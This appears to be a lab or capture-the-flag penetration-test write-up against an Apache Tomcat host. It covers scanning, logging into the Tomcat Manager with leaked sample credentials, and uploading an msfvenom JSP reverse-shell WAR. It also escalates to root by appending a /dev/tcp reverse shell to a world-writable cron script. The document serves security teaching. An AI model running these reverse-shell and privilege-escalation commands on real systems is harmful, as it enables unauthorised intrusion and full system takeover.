Skip to main content

Thompson

This report details a successful penetration test against a target system running Apache Tomcat. The attack vector exploited a default/weak credential vulnerability in the Tomcat Manager application, leading to remote code execution (RCE) via a malicious WAR file upload. Further enumeration revealed a scheduled task running as root, which was leveraged to achieve privilege escalation.

1. Reconnaissance and Enumeration

1.1. Port Scanning

export TARGET_IP=10.10.130.14
nmap -p- --min-rate 5000 $TARGET_IP

Results:

Not shown: 65371 closed tcp ports (reset), 161 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
8009/tcp open ajp13
8080/tcp open http-proxy

1.2. Web Application Enumeration

Based on the nmap results, we focused on port 8080. Browsing to http://$TARGET_IP:8080 revealed the default Apache Tomcat welcome page. Further investigation identified a potential /manager path, consistent with the Tomcat Manager application.

Reference: Apache Tomcat Manager Application Documentation

2. Exploitation: Tomcat Manager Weak Credentials

2.1. Identifying Default Credentials

Accessing http://$TARGET_IP:8080/manager prompted for authentication. Canceling the authentication request resulted in a 401 Unauthorized error page. Critically, this error page revealed example credentials within the HTML source code.

Explanation: The error page inadvertently disclosed configuration instructions that included a sample username (tomcat) and password (s3cret). This is a serious security flaw, as default or easily guessable credentials are a common attack vector.

2.2. Gaining Access via WAR File Upload

Using the discovered credentials (tomcat:s3cret), we successfully logged into the Tomcat Manager application. This application provides a feature to deploy web applications by uploading WAR (Web Application Archive) files.

2.3. Crafting a Reverse Shell Payload

A malicious WAR file containing a JSP (JavaServer Pages) reverse shell was created using msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.2.17.44 LPORT=6666 -f war > reverse.war

2.4. Deploying the Payload and Obtaining a Shell

The reverse.war file was uploaded through the Tomcat Manager interface. A netcat listener was started on the attacker's machine:

nc -lvnp 6666

Then, the deployed application was accessed by navigating to http://$TARGET_IP:8080/reverse/. This triggered the reverse shell, establishing a connection to the listener:

id # uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)

3. Post-Exploitation and Privilege Escalation

3.1. Terminal Sanitization

To improve the interactive shell experience, the following steps were taken to sanitize the terminal:

script /dev/null -c bash  # Start a clean bash session recording to /dev/null
# Press CTRL + Z (to background the process)
stty raw -echo; fg # Set terminal to raw mode and bring the process back to foreground
reset xterm # Reset the terminal
export TERM=xterm # Set the terminal type
export SHELL=/bin/bash # Set the shell explicitly
stty size # Determine current terminal dimensions
stty rows <ROWS> columns <COLUMNS> # Set terminal dimensions (replace <ROWS> and <COLUMNS> with output from stty size)

3.2. Enumerating Scheduled Tasks

The system was enumerated to identify potential privilege escalation paths. The /etc/crontab file was examined to list scheduled tasks:

cat /etc/crontab

Output:

*  *	* * *	root	cd /home/jack && bash id.sh

Analysis: This reveals a cron job running as root every minute. The job changes the directory to /home/jack and executes the script id.sh.

3.3. Identifying a Writable Script

The permissions of the id.sh script were checked:

ls -l /home/jack/id.sh
Output
-rwxrwxrwx 1 jack jack   26 Aug 14  2019 id.sh

Explanation: The script id.sh had write permissions for all users. This is a critical vulnerability, as any user can modify a script that is executed by root.

The content of the script was checked.

cat /home/jack/id.sh
id.sh
#!/bin/bash
id > test.txt

3.4. Exploiting the Cron Job for Privilege Escalation

A reverse shell command was appended to the id.sh script:

echo "sh -i >& /dev/tcp/10.2.17.44/6666 0>&1" >> /home/jack/id.sh

A new netcat listener was started on the attacker's machine:

nc -lvnp 6666

Within a minute, the cron job executed the modified script, resulting in a reverse shell connection as root:

id # uid=0(root) gid=0(root) groups=0(root)

Result: Privilege escalation to root achieved.